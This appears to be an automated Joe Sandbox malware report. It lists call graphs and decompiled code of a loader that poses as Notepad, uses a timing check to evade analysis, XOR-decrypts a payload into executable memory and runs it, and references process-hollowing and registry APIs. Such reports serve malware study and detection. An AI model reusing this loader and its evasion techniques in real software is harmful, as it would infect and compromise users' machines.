8371->8372 8373 4087d2 8372->8373 8374 4087cf InterlockedDecrement 8372->8374 8375 4087dc InterlockedDecrement 8373->8375 8376 4087df 8373->8376 8374->8373 8375->8376 8377 4087f8 InterlockedDecrement 8376->8377 8378 408808 InterlockedDecrement 8376->8378 8379 408813 InterlockedDecrement 8376->8379 8377->8376 8378->8376 8379->8368 8386 40883f 8380->8386 8409 4088ac 8380->8409 8381 4088f9 8384 40bd05 ___free_lc_time 66 API calls 8381->8384 8400 408922 8381->8400 8382 408bc0 _free 66 API calls 8383 4088cd 8382->8383 8387 408bc0 _free 66 API calls 8383->8387 8389 408917 8384->8389 8385 408873 8388 408894 8385->8388 8399 408bc0 _free 66 API calls 8385->8399 8386->8385 8394 408bc0 _free 66 API calls 8386->8394 8386->8409 8390 4088e0 8387->8390 8391 408bc0 _free 66 API calls 8388->8391 8393 408bc0 _free 66 API calls 8389->8393 8397 408bc0 _free 66 API calls 8390->8397 8401 4088a1 8391->8401 8392 408967 8395 408bc0 _free 66 API calls 8392->8395 8393->8400 8396 408868 8394->8396 8402 40896d 8395->8402 8403 40c0e5 ___free_lconv_mon 66 API calls 8396->8403 8404 4088ee 8397->8404 8398 408bc0 66 API calls _free 8398->8400 8405 408889 8399->8405 8400->8392 8400->8398 8406 408bc0 _free 66 API calls 8401->8406 8402->8356 8403->8385 8407 408bc0 _free 66 API calls 8404->8407 8408 40c07c ___free_lconv_num 66 API calls 8405->8408 8406->8409 8407->8381 8408->8388 8409->8381 8409->8382 8410->8365 8414 40a27e LeaveCriticalSection 8411->8414 8413 4082e1 8413->8344 8414->8413 8416 405952 LeaveCriticalSection 8415->8416 8417 405933 8415->8417 8416->7830 8417->8416 8418 40593a 8417->8418 8421 40a27e LeaveCriticalSection 8418->8421 8420 40594f 8420->7830 8421->8420 8423 4058c1 8422->8423 8424 4058e3 EnterCriticalSection 8422->8424 8423->8424 8426 4058c9 8423->8426 8425 40309b 8424->8425 8428 402fcb 8425->8428 8427 40a357 __lock 66 API calls 8426->8427 8427->8425 8429 402feb 8428->8429 8430 402fdb 8428->8430 8432 402ffd 8429->8432 8481 402dd2 8429->8481 8431 40370a __free_osfhnd 66 API calls 8430->8431 8439 402fe0 8431->8439 8443 405f0d 8432->8443 8437 40303d 8456 405e39 8437->8456 8440 4030c7 8439->8440 8441 405922 __wfsopen 2 API calls 8440->8441 8442 4030cf 8441->8442 8442->7659 8444 40300b 8443->8444 8445 405f26 8443->8445 8449 40573d 8444->8449 8445->8444 8446 40573d __ftell_nolock 66 API calls 8445->8446 8447 405f41 8446->8447 8448 407e92 __write 97 API calls 8447->8448 8448->8444 8450 405749 8449->8450 8451 40575e 8449->8451 8452 40370a __free_osfhnd 66 API calls 8450->8452 8451->8437 8453 40574e 8452->8453 8454 4036b8 __cftoe_l 11 API calls 8453->8454 8455 405759 8454->8455 8455->8437 8457 405e45 __write 8456->8457 8458 405e68 8457->8458 8459 405e4d 8457->8459 8461 405e74 8458->8461 8464 405eae 8458->8464 8460 40371d __free_osfhnd 66 API calls 8459->8460 8462 405e52 8460->8462 8463 40371d __free_osfhnd 66 API calls 8461->8463 8465 40370a __free_osfhnd 66 API calls 8462->8465 8466 405e79 8463->8466 8468 409b77 ___lock_fhandle 68 API calls 8464->8468 8469 405e5a __write 8465->8469 8467 40370a __free_osfhnd 66 API calls 8466->8467 8470 405e81 8467->8470 8471 405eb4 8468->8471 8469->8439 8472 4036b8 __cftoe_l 11 API calls 8470->8472 8473 405ec2 8471->8473 8474 405ed6 8471->8474 8472->8469 8475 405dc4 __lseek_nolock 68 API calls 8473->8475 8476 40370a __free_osfhnd 66 API calls 8474->8476 8478 405ece 8475->8478 8477 405edb 8476->8477 8479 40371d __free_osfhnd 66 API calls 8477->8479 8498 405f05 8478->8498 8479->8478 8482 402de5 8481->8482 8483 402dfd 8481->8483 8485 40370a __free_osfhnd 66 API calls 8482->8485 8484 40573d __ftell_nolock 66 API calls 8483->8484 8486 402e04 8484->8486 8487 402dea 8485->8487 8489 405e39 __write 71 API calls 8486->8489 8488 4036b8 __cftoe_l 11 API calls 8487->8488 8497 402df5 8488->8497 8490 402e1b 8489->8490 8491 402e8d 8490->8491 8493 402e4d 8490->8493 8490->8497 8492 40370a __free_osfhnd 66 API calls 8491->8492 8492->8497 8494 405e39 __write 71 API calls 8493->8494 8493->8497 8495 402ee8 8494->8495 8496 405e39 __write 71 API calls 8495->8496 8495->8497 8496->8497 8497->8432 8501 409c16 LeaveCriticalSection 8498->8501 8500 405f0b 8500->8469 8501->8500 8503 405922 __wfsopen 2 API calls 8502->8503 8504 402fc9 8503->8504 8504->7672 8506 402d33 __write 8505->8506 8507 402d74 8506->8507 8508 402d47 _memset 8506->8508 8509 402d6c __write 8506->8509 8510 4058af __lock_file 67 API calls 8507->8510 8511 40370a __free_osfhnd 66 API calls 8508->8511 8509->7675 8512 402d7c 8510->8512 8513 402d61 8511->8513 8518 402b6b 8512->8518 8515 4036b8 __cftoe_l 11 API calls 8513->8515 8515->8509 8519 402ba3 8518->8519 8522 402b89 _memset 8518->8522 8532 402dab 8519->8532 8520 402b93 8521 40370a __free_osfhnd 66 API calls 8520->8521 8530 402b98 8521->8530 8522->8519 8522->8520 8525 402bde 8522->8525 8523 4036b8 __cftoe_l 11 API calls 8523->8519 8525->8519 8527 402ce9 _memset 8525->8527 8528 40573d __ftell_nolock 66 API calls 8525->8528 8535 405647 8525->8535 8565 404f6e 8525->8565 8585 405763 8525->8585 8529 40370a __free_osfhnd 66 API calls 8527->8529 8528->8525 8529->8530 8530->8523 8533 405922 __wfsopen 2 API calls 8532->8533 8534 402db3 8533->8534 8534->8509 8536 405653 __write 8535->8536 8537 405676 8536->8537 8538 40565b 8536->8538 8539 405682 8537->8539 8544 4056bc 8537->8544 8540 40371d __free_osfhnd 66 API calls 8538->8540 8541 40371d __free_osfhnd 66 API calls 8539->8541 8542 405660 8540->8542 8543 405687 8541->8543 8545 40370a __free_osfhnd 66 API calls 8542->8545 8546 40370a __free_osfhnd 66 API calls 8543->8546 8547 4056c9 8544->8547 8548 4056de 8544->8548 8552 405668 __write 8545->8552 8550 40568f 8546->8550 8551 40371d __free_osfhnd 66 API calls 8547->8551 8549 409b77 ___lock_fhandle 68 API calls 8548->8549 8553 4056e4 8549->8553 8558 4036b8 __cftoe_l 11 API calls 8550->8558 8554 4056ce 8551->8554 8552->8525 8556 4056f2 8553->8556 8557 405706 8553->8557 8555 40370a __free_osfhnd 66 API calls 8554->8555 8555->8550 8559 405090 __read_nolock 76 API calls 8556->8559 8560 40370a __free_osfhnd 66 API calls 8557->8560 8558->8552 8561 4056fe 8559->8561 8562 40570b 8560->8562 8594 405735 8561->8594 8563 40371d __free_osfhnd 66 API calls 8562->8563 8563->8561 8566 404f7b 8565->8566 8569 404f90 8565->8569 8567 40370a __free_osfhnd 66 API calls 8566->8567 8568 404f80 8567->8568 8570 4036b8 __cftoe_l 11 API calls 8568->8570 8571 404fc5 8569->8571 8579 404f8b 8569->8579 8598 407f66 8569->8598 8570->8579 8573 40573d __ftell_nolock 66 API calls 8571->8573 8574 404fd9 8573->8574 8575 405647 __read 79 API calls 8574->8575 8576 404fe0 8575->8576 8577 40573d __ftell_nolock 66 API calls 8576->8577 8576->8579 8578 405003 8577->8578 8578->8579 8580 40573d __ftell_nolock 66 API calls 8578->8580 8579->8525 8581 40500f 8580->8581 8581->8579 8582 40573d __ftell_nolock 66 API calls 8581->8582 8583 40501c 8582->8583 8584 40573d __ftell_nolock 66 API calls 8583->8584 8584->8579 8587 405774 _memset 8585->8587 8592 405770 _memmove 8585->8592 8586 40577a 8588 40370a __free_osfhnd 66 API calls 8586->8588 8587->8586 8590 4057bf 8587->8590 8587->8592 8589 40577f 8588->8589 8591 4036b8 __cftoe_l 11 API calls 8589->8591 8590->8592 8593 40370a __free_osfhnd 66 API calls 8590->8593 8591->8592 8592->8525 8593->8589 8597 409c16 LeaveCriticalSection 8594->8597 8596 40573b 8596->8552 8597->8596 8599 408bfa __malloc_crt 66 API calls 8598->8599 8600 407f7b 8599->8600 8600->8571 8616 59005f GetPEB 8601->8616 8603 590a98 8603->7677 8604 590aa6 CreateProcessW 8605 590ad5 GetThreadContext 8604->8605 8608 590ad0 8604->8608 8606 590af5 ReadProcessMemory 8605->8606 8605->8608 8606->8608 8614 5908fd 8606->8614 8608->8603 8638 591b03 8608->8638 8610 591cb2 11 API calls 8610->8614 8612 590d5a SetThreadContext 8612->8608 8612->8614 8614->8603 8614->8604 8614->8608 8614->8610 8614->8612 8615 591b03 11 API calls 8614->8615 8617 591b98 8614->8617 8626 591951 8614->8626 8632 591a52 8614->8632 8615->8614 8616->8614 8618 591bb3 8617->8618 8647 59013e GetPEB 8618->8647 8620 591bd4 8621 591c8c 8620->8621 8622 591bdc 8620->8622 8664 591fde 8621->8664 8649 591752 8622->8649 8625 591c73 8625->8614 8627 59196c 8626->8627 8628 59013e GetPEB 8627->8628 8629 59198d 8628->8629 8630 591752 10 API calls 8629->8630 8631 591a06 8629->8631 8630->8631 8631->8614 8633 591a6d 8632->8633 8634 59013e GetPEB 8633->8634 8635 591a8e 8634->8635 8636 591752 10 API calls 8635->8636 8637 591acd 8635->8637 8636->8637 8637->8614 8639 591b16 8638->8639 8640 59013e GetPEB 8639->8640 8641 591b37 8640->8641 8642 591b3b 8641->8642 8643 591b81 8641->8643 8645 591752 10 API calls 8642->8645 8674 591fcc 8643->8674 8646 591b76 8645->8646 8646->8603 8648 590160 8647->8648 8648->8620 8667 59005f GetPEB 8649->8667 8651 59179b 8668 590109 GetPEB 8651->8668 8654 591828 8655 591839 VirtualAlloc 8654->8655 8660 5918fd 8654->8660 8656 59184f ReadFile 8655->8656 8655->8660 8657 591864 VirtualAlloc 8656->8657 8656->8660 8657->8660 8661 591885 8657->8661 8658 59193b VirtualFree 8659 591946 8658->8659 8659->8625 8660->8658 8660->8659 8661->8660 8662 5918ec FindCloseChangeNotification 8661->8662 8663 5918f0 VirtualFree 8661->8663 8662->8663 8663->8660 8665 591752 10 API calls 8664->8665 8666 591fe8 8665->8666 8666->8625 8667->8651 8669 59011c 8668->8669 8671 590131 CreateFileW 8669->8671 8672 59017b GetPEB 8669->8672 8671->8654 8671->8660 8673 59019f 8672->8673 8673->8669 8675 591752 10 API calls 8674->8675 8676 591fd6 8675->8676 8676->8646 8677->7683 8703 59005f GetPEB 8678->8703 8680 590f31 8704 59005f GetPEB 8680->8704 8682 590f44 8705 59005f GetPEB 8682->8705 8684 590f57 8706 590ebf 8684->8706 8686 590f65 8687 590f81 VirtualAllocExNuma 8686->8687 8688 590f8e 8687->8688 8711 590e1f 8688->8711 8718 59005f GetPEB 8691->8718 8693 59066b 8702 590813 CreateFileW 8693->8702 8719 59037c 8693->8719 8698 59085e RegGetValueW 8699 59087b RegOpenKeyExW 8698->8699 8698->8702 8699->8698 8700 590897 RegSetValueExW 8699->8700 8700->8702 8702->7685 8702->7689 8703->8680 8704->8682 8705->8684 8716 59005f GetPEB 8706->8716 8708 590ecf 8709 590ed5 GetSystemInfo 8708->8709 8710 590f00 8709->8710 8710->8686 8717 59005f GetPEB 8711->8717 8713 590e2b 8714 590e4b VirtualAlloc 8713->8714 8715 590e68 8714->8715 8715->7686 8716->8708 8717->8713 8718->8693 8735 59005f GetPEB 8719->8735 8721 5903d6 8722 590401 PathFileExistsW 8721->8722 8723 59041a 8722->8723 8724 59040d CreateDirectoryW 8722->8724 8723->8702 8725 59020a 8723->8725 8724->8723 8736 59005f GetPEB 8725->8736 8727 59026a 8728 5902db PathFileExistsW 8727->8728 8729 5902ec CreateFileW 8728->8729 8734 590309 8728->8734 8730 59030d 8729->8730 8729->8734 8731 590318 VirtualAlloc 8730->8731 8730->8734 8732 59032e ReadFile 8731->8732 8731->8734 8733 59033d FindCloseChangeNotification CreateFileW WriteFile 8732->8733 8732->8734 8733->8734 8734->8698 8734->8702 8735->8721 8736->8727 8738 40152c SetRect lstrcpyW LoadStringW LoadStringW RegOpenKeyW 8737->8738 8738->7699 8738->7700 8740 4010b1 MulDiv 8739->8740 8741 401073 RegQueryValueExW 8739->8741 8740->7744 8742 4010a8 RegCloseKey 8741->8742 8743 40109a 8741->8743 8742->8740 8743->8742 8744->7765 8745->7769 8749 40682f 8746->8749 8748 406996 8750 40683b __write 8749->8750 8751 40a357 __lock 61 API calls 8750->8751 8752 406842 8751->8752 8753 40686d DecodePointer 8752->8753 8758 4068ec 8752->8758 8755 406884 DecodePointer 8753->8755 8753->8758 8768 406897 8755->8768 8757 406969 __write 8757->8748 8772 40695a 8758->8772 8760 406951 8762 406717 _doexit 3 API calls 8760->8762 8763 40695a 8762->8763 8764 406967 8763->8764 8777 40a27e LeaveCriticalSection 8763->8777 8764->8748 8765 4068ae DecodePointer 8771 4070f9 RtlEncodePointer 8765->8771 8768->8758 8768->8765 8769 4068bd DecodePointer DecodePointer 8768->8769 8770 4070f9 RtlEncodePointer 8768->8770 8769->8768 8770->8768 8771->8768 8773 406960 8772->8773 8774 40693a 8772->8774 8778 40a27e LeaveCriticalSection 8773->8778 8774->8757 8776 40a27e LeaveCriticalSection 8774->8776 8776->8760 8777->8764 8778->8774 9527 4086a9 9530 40a27e LeaveCriticalSection 9527->9530 9529 4086b0 9530->9529 8975 40b0eb 8976 40b0ee 8975->8976 8979 40ecd1 8976->8979 8988 40b166 DecodePointer 8979->8988 8981 40ecd6 8982 40ece1 8981->8982 8989 40b173 8981->8989 8984 40ecf9 8982->8984 8985 40353d __call_reportfault 8 API calls 8982->8985 8986 406985 _abort 66 API calls 8984->8986 8985->8984 8987 40ed03 8986->8987 8988->8981 8991 40b17f __write 8989->8991 8990 40b1da 8993 40b1bc DecodePointer 8990->8993 8996 40b1e9 8990->8996 8991->8990 8992 40b1a6 8991->8992 8991->8993 8998 40b1a2 8991->8998 8994 407230 __getptd_noexit 66 API calls 8992->8994 8999 40b1ab _siglookup 8993->8999 8994->8999 8997 40370a __free_osfhnd 66 API calls 8996->8997 9000 40b1ee 8997->9000 8998->8992 8998->8996 9001 40b246 8999->9001 9003 406985 _abort 66 API calls 8999->9003 9009 40b1b4 __write 8999->9009 9002 4036b8 __cftoe_l 11 API calls 9000->9002 9004 40a357 __lock 66 API calls 9001->9004 9005 40b251 9001->9005 9002->9009 9003->9001 9004->9005 9007 40b286 9005->9007 9010 4070f9 RtlEncodePointer 9005->9010 9011 40b2da 9007->9011 9009->8982 9010->9007 9012 40b2e0 9011->9012 9013 40b2e7 9011->9013 9015 40a27e LeaveCriticalSection 9012->9015 9013->9009 9015->9013 8779 4070f9 RtlEncodePointer

                                                                                    Control-flow Graph

                                                                                    C-Code - Quality: 74%
                                                                                    			E00402571(signed long long __fp0, struct HINSTANCE__* _a4, void* _a12, int _a16) {
                                                                                    				_Unknown_base(*)()* _v8;
                                                                                    				_Unknown_base(*)()* _v12;
                                                                                    				_Unknown_base(*)()* _v16;
                                                                                    				struct tagMSG _v44;
                                                                                    				intOrPtr _v52;
                                                                                    				intOrPtr _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				struct tagMONITORINFO _v84;
                                                                                    				struct _WNDCLASSEXW _v132;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				void* _t54;
                                                                                    				void* _t55;
                                                                                    				struct HINSTANCE__* _t63;
                                                                                    				int _t65;
                                                                                    				struct HMONITOR__* _t70;
                                                                                    				int _t72;
                                                                                    				struct HWND__* _t73;
                                                                                    				int _t81;
                                                                                    				int _t83;
                                                                                    				int _t85;
                                                                                    				void* _t92;
                                                                                    				long _t94;
                                                                                    				WCHAR* _t104;
                                                                                    				int _t106;
                                                                                    				struct HACCEL__* _t107;
                                                                                    				long _t108;
                                                                                    				intOrPtr _t110;
                                                                                    				signed int _t112;
                                                                                    				intOrPtr _t114;
                                                                                    				int _t117;
                                                                                    				void* _t119;
                                                                                    				void* _t121;
                                                                                    				signed int _t122;
                                                                                    				void* _t127;
                                                                                    				signed long long _t135;
                                                                                    
                                                                                    				_t135 = __fp0;
                                                                                    				_t104 = L"Kernel32.dll";
                                                                                    				_v8 = GetProcAddress(GetModuleHandleW(_t104), "GetTickCount");
                                                                                    				_v12 = GetProcAddress(GetModuleHandleW(_t104), "Sleep");
                                                                                    				_v16 = GetProcAddress(GetModuleHandleW(_t104), "VirtualAlloc");
                                                                                    				_t54 = _v8();
                                                                                    				Sleep(0x2be);
                                                                                    				_t55 = _v8();
                                                                                    				_t131 = _t55 - _t54 - 0x2bc;
                                                                                    				if(_t55 - _t54 < 0x2bc) {
                                                                                    					L4:
                                                                                    					 *0x4151c0 = RegisterWindowMessageW(L"commdlg_FindReplace");
                                                                                    					E004031B0(0x415f60, 0, 0x11f4);
                                                                                    					 *0x415f60 = _a4;
                                                                                    					E004014EC(_t113, _t135);
                                                                                    					_t117 = 0x30;
                                                                                    					E004031B0( &_v132, 0, _t117);
                                                                                    					_t63 =  *0x415f60; // 0x0
                                                                                    					_v132.cbSize = _t117;
                                                                                    					_v132.lpfnWndProc = E0040232A;
                                                                                    					_v132.hInstance = _t63;
                                                                                    					_v132.hIcon = LoadIconW(_t63, 0x300);
                                                                                    					_t65 = GetSystemMetrics(0x32);
                                                                                    					_v132.hIconSm = LoadImageW( *0x415f60, 0x300, 1, GetSystemMetrics(0x31), _t65, 0x8000);
                                                                                    					_v132.hCursor = LoadCursorW(0, 0x7f00);
                                                                                    					_v132.hbrBackground = 6;
                                                                                    					_v132.lpszMenuName = 0x201;
                                                                                    					_v132.lpszClassName = L"Notepad";
                                                                                    					_t70 = RegisterClassExW( &_v132);
                                                                                    					if(_t70 == 0) {
                                                                                    						return 0;
                                                                                    					}
                                                                                    					__imp__MonitorFromRect(0x4151c4, 1);
                                                                                    					_v84.cbSize = 0x28;
                                                                                    					GetMonitorInfoW(_t70,  &_v84);
                                                                                    					_t72 =  *0x4151c4; // 0x0
                                                                                    					_t119 =  *0x4151c8; // 0x0
                                                                                    					_t110 =  *0x4151d0; // 0x0
                                                                                    					_t114 =  *0x4151cc; // 0x0
                                                                                    					_t106 = _t72;
                                                                                    					_a12 = _t119;
                                                                                    					__eflags = _t72 - _v56;
                                                                                    					if(_t72 >= _v56) {
                                                                                    						L10:
                                                                                    						_a12 = 0x80000000;
                                                                                    						_t106 = 0x80000000;
                                                                                    						L11:
                                                                                    						_t73 = CreateWindowExW(0, L"Notepad", L"Notepad", 0xcf0000, _t106, _a12, _t114 - _t72, _t110 - _t119, 0, 0,  *0x415f60, 0);
                                                                                    						 *0x415f64 = _t73;
                                                                                    						__eflags = _t73;
                                                                                    						if(_t73 != 0) {
                                                                                    							E00401ABC();
                                                                                    							0x400000();
                                                                                    							ShowWindow( *0x415f64, _a16);
                                                                                    							UpdateWindow( *0x415f64);
                                                                                    							DragAcceptFiles( *0x415f64, 1);
                                                                                    							E00401F93(GetCommandLineW());
                                                                                    							_t107 = LoadAcceleratorsW(_a4, 0x203);
                                                                                    							while(1) {
                                                                                    								_t81 = GetMessageW( &_v44, 0, 0, 0);
                                                                                    								__eflags = _t81;
                                                                                    								if(_t81 == 0) {
                                                                                    									break;
                                                                                    								}
                                                                                    								_t83 = IsDialogMessageW( *0x415f68,  &_v44);
                                                                                    								__eflags = _t83;
                                                                                    								if(_t83 == 0) {
                                                                                    									_t85 = TranslateAcceleratorW( *0x415f64, _t107,  &_v44);
                                                                                    									__eflags = _t85;
                                                                                    									if(_t85 == 0) {
                                                                                    										TranslateMessage( &_v44);
                                                                                    										DispatchMessageW( &_v44);
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							return _v44.wParam;
                                                                                    						}
                                                                                    						0x400000();
                                                                                    						ExitProcess(1);
                                                                                    					}
                                                                                    					__eflags = _t119 - _v52;
                                                                                    					if(_t119 >= _v52) {
                                                                                    						goto L10;
                                                                                    					}
                                                                                    					__eflags = _t114 - _v84.rcWork;
                                                                                    					if(_t114 < _v84.rcWork) {
                                                                                    						goto L10;
                                                                                    					}
                                                                                    					__eflags = _t110 - _v60;
                                                                                    					if(_t110 >= _v60) {
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					goto L10;
                                                                                    				}
                                                                                    				_t92 = E0040318F(_a12, L"rb"); // executed
                                                                                    				_push(2);
                                                                                    				_t121 = _t92;
                                                                                    				_push(0);
                                                                                    				_push(_t121); // executed
                                                                                    				E00403055(_t104, _t121, 0, _t131); // executed
                                                                                    				_push(_t121); // executed
                                                                                    				_t94 = E00402F66(_t104, _t121, 0, _t131); // executed
                                                                                    				_push(0);
                                                                                    				_push(0);
                                                                                    				_push(_t121);
                                                                                    				_t108 = _t94; // executed
                                                                                    				E00403055(_t108, _t121, 0, _t131); // executed
                                                                                    				_a12 = VirtualAlloc(0, _t108, 0x3000, 0x40);
                                                                                    				E00402DB5(_t96, _t108, 1, _t121); // executed
                                                                                    				_t127 = _t127 + 0x34;
                                                                                    				_t112 = 0;
                                                                                    				if(_t108 <= 0) {
                                                                                    					L3:
                                                                                    					_a12();
                                                                                    					goto L4;
                                                                                    				} else {
                                                                                    					goto L2;
                                                                                    				}
                                                                                    				do {
                                                                                    					L2:
                                                                                    					_v16 = _a12 + _t112;
                                                                                    					asm("cdq");
                                                                                    					_t122 = 0xc;
                                                                                    					_t113 = _t112 % _t122;
                                                                                    					 *_v16 =  *_v16 ^  *("248058040134" + _t112 % _t122);
                                                                                    					_t112 = _t112 + 1;
                                                                                    				} while (_t112 < _t108);
                                                                                    				goto L3;
                                                                                    			}









































                                                                                    0x00402571
                                                                                    0x00402588
                                                                                    0x0040259f
                                                                                    0x004025ad
                                                                                    0x004025b5
                                                                                    0x004025b8
                                                                                    0x004025c2
                                                                                    0x004025c5
                                                                                    0x004025cc
                                                                                    0x004025d1
                                                                                    0x00402643
                                                                                    0x00402659
                                                                                    0x0040265f
                                                                                    0x0040266a
                                                                                    0x0040266f
                                                                                    0x00402676
                                                                                    0x0040267d
                                                                                    0x00402682
                                                                                    0x00402691
                                                                                    0x00402694
                                                                                    0x0040269b
                                                                                    0x004026b1
                                                                                    0x004026b4
                                                                                    0x004026d1
                                                                                    0x004026da
                                                                                    0x004026e1
                                                                                    0x004026e8
                                                                                    0x004026ef
                                                                                    0x004026f6
                                                                                    0x004026ff
                                                                                    0x00000000
                                                                                    0x00402701
                                                                                    0x0040270f
                                                                                    0x0040271a
                                                                                    0x00402721
                                                                                    0x00402727
                                                                                    0x0040272c
                                                                                    0x00402732
                                                                                    0x00402738
                                                                                    0x0040273e
                                                                                    0x00402740
                                                                                    0x00402743
                                                                                    0x00402746
                                                                                    0x00402757
                                                                                    0x00402757
                                                                                    0x0040275e
                                                                                    0x00402763
                                                                                    0x00402786
                                                                                    0x0040278c
                                                                                    0x00402791
                                                                                    0x00402793
                                                                                    0x004027a2
                                                                                    0x004027a7
                                                                                    0x004027b5
                                                                                    0x004027c1
                                                                                    0x004027cf
                                                                                    0x004027db
                                                                                    0x004027f4
                                                                                    0x00402835
                                                                                    0x0040283c
                                                                                    0x0040283e
                                                                                    0x00402840
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402802
                                                                                    0x00402808
                                                                                    0x0040280a
                                                                                    0x00402817
                                                                                    0x0040281d
                                                                                    0x0040281f
                                                                                    0x00402825
                                                                                    0x0040282f
                                                                                    0x0040282f
                                                                                    0x0040281f
                                                                                    0x0040280a
                                                                                    0x00000000
                                                                                    0x00402842
                                                                                    0x00402795
                                                                                    0x0040279c
                                                                                    0x0040279c
                                                                                    0x00402748
                                                                                    0x0040274b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040274d
                                                                                    0x00402750
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402752
                                                                                    0x00402755
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402755
                                                                                    0x004025db
                                                                                    0x004025e0
                                                                                    0x004025e2
                                                                                    0x004025e4
                                                                                    0x004025e5
                                                                                    0x004025e6
                                                                                    0x004025eb
                                                                                    0x004025ec
                                                                                    0x004025f1
                                                                                    0x004025f2
                                                                                    0x004025f3
                                                                                    0x004025f4
                                                                                    0x004025f6
                                                                                    0x0040260f
                                                                                    0x00402612
                                                                                    0x00402617
                                                                                    0x0040261a
                                                                                    0x0040261e
                                                                                    0x00402640
                                                                                    0x00402640
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402620
                                                                                    0x00402620
                                                                                    0x00402625
                                                                                    0x0040262a
                                                                                    0x0040262d
                                                                                    0x0040262e
                                                                                    0x00402639
                                                                                    0x0040263b
                                                                                    0x0040263c
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTickCount), ref: 0040258E
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00402597
                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,Sleep), ref: 004025A2
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004025A5
                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 004025B0
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004025B3
                                                                                    • Sleep.KERNELBASE(000002BE), ref: 004025C2
                                                                                    • _fseek.LIBCMT ref: 004025E6
                                                                                    • _fseek.LIBCMT ref: 004025F6
                                                                                      • Part of subcall function 00403055: __lock_file.LIBCMT ref: 00403096
                                                                                      • Part of subcall function 00403055: __fseek_nolock.LIBCMT ref: 004030A7
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00402607
                                                                                    • __fread_nolock.LIBCMT ref: 00402612
                                                                                    • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 00402648
                                                                                    • _memset.LIBCMT ref: 0040265F
                                                                                    • _memset.LIBCMT ref: 0040267D
                                                                                    • LoadIconW.USER32 ref: 0040269E
                                                                                    • GetSystemMetrics.USER32 ref: 004026B4
                                                                                    • GetSystemMetrics.USER32 ref: 004026B9
                                                                                    • LoadImageW.USER32 ref: 004026C5
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004026D4
                                                                                    • RegisterClassExW.USER32 ref: 004026F6
                                                                                      • Part of subcall function 0040318F: __wfsopen.LIBCMT ref: 0040319C
                                                                                    • MonitorFromRect.USER32(004151C4,00000001), ref: 0040270F
                                                                                    • GetMonitorInfoW.USER32 ref: 00402721
                                                                                    • CreateWindowExW.USER32 ref: 00402786
                                                                                    • ExitProcess.KERNEL32 ref: 0040279C
                                                                                    • ShowWindow.USER32(?), ref: 004027B5
                                                                                    • UpdateWindow.USER32 ref: 004027C1
                                                                                    • DragAcceptFiles.SHELL32(00000001), ref: 004027CF
                                                                                    • GetCommandLineW.KERNEL32 ref: 004027D5
                                                                                    • LoadAcceleratorsW.USER32 ref: 004027E8
                                                                                    • IsDialogMessageW.USER32(?), ref: 00402802
                                                                                    • TranslateAcceleratorW.USER32(00000000,?), ref: 00402817
                                                                                    • TranslateMessage.USER32(?), ref: 00402825
                                                                                    • DispatchMessageW.USER32 ref: 0040282F
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040283C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$LoadWindow$AddressHandleModuleProc$MetricsMonitorRegisterSystemTranslate_fseek_memset$AcceleratorAcceleratorsAcceptAllocClassCommandCreateCursorDialogDispatchDragExitFilesFromIconImageInfoLineProcessRectShowSleepUpdateVirtual__fread_nolock__fseek_nolock__lock_file__wfsopen
                                                                                    • String ID: ($GetTickCount$Kernel32.dll$Notepad$Notepad$Sleep$VirtualAlloc$commdlg_FindReplace
                                                                                    • API String ID: 1051210470-2062807747
                                                                                    • Opcode ID: c0167c71671bf53e787d6d9d4aae9a93767b5de61ac2528c01b7e0414419f5a9
                                                                                    • Instruction ID: 86ed525f5f6418c5d4d27ac436486db8ae60d9136c2ac2c32b89dc552047780a
                                                                                    • Opcode Fuzzy Hash: c0167c71671bf53e787d6d9d4aae9a93767b5de61ac2528c01b7e0414419f5a9
                                                                                    • Instruction Fuzzy Hash: AE816D71940208BBDB10AFA5DD4DFDE7FB8EB48704F10443AF500A61A1D7B99981CB68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 312 590f9c-5911b9 call 59005f call 590f1d call 590073 * 8 334 5911bb 312->334 335 5911c0-5911d3 312->335 336 59174e-591751 334->336 338 5911da-591211 call 590422 CreateFileW 335->338 339 5911d5 335->339 342 591218-591247 VirtualAlloc ReadFile 338->342 343 591213 338->343 339->336 344 591249 342->344 345 59124e-591261 342->345 343->336 344->336 347 591735-591744 call 5908ef 345->347 348 591267-591730 345->348 351 591746-591748 ExitProcess 347->351
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
